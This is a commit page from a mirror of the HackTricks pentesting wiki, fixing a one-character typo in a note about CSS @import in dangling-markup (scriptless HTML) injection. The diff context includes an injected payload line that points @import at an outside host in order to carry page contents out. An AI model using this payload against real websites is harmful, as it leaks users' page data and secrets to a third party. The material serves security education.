0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

Update in content

Browse source 
Line should be
You can also abuse CSS @import (will send all the code until it find a ";") 
not colon
This commit is contained in:
Rishu Ranjan 2021-09-23 15:20:01 +05:30 committed by GitHub
parent 78263a7294
commit 84f56735df
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
pentesting-web/dangling-markup-html-scriptless-injection.md
View file

@ -23,7 +23,7 @@ If the `img` tag is forbidden \(due to CSP for example\) you can also use `<meta
Note that **Chrome blocks HTTP URLs** with "&lt;" or "\n" in it, so you could try other protocol schemes like "ftp".
You can also abuse CSS `@import` \(will send all the code until it find a ":"\)
You can also abuse CSS `@import` \(will send all the code until it find a ";"\)
```markup
<style>@import//hackvertor.co.uk? <--- Injected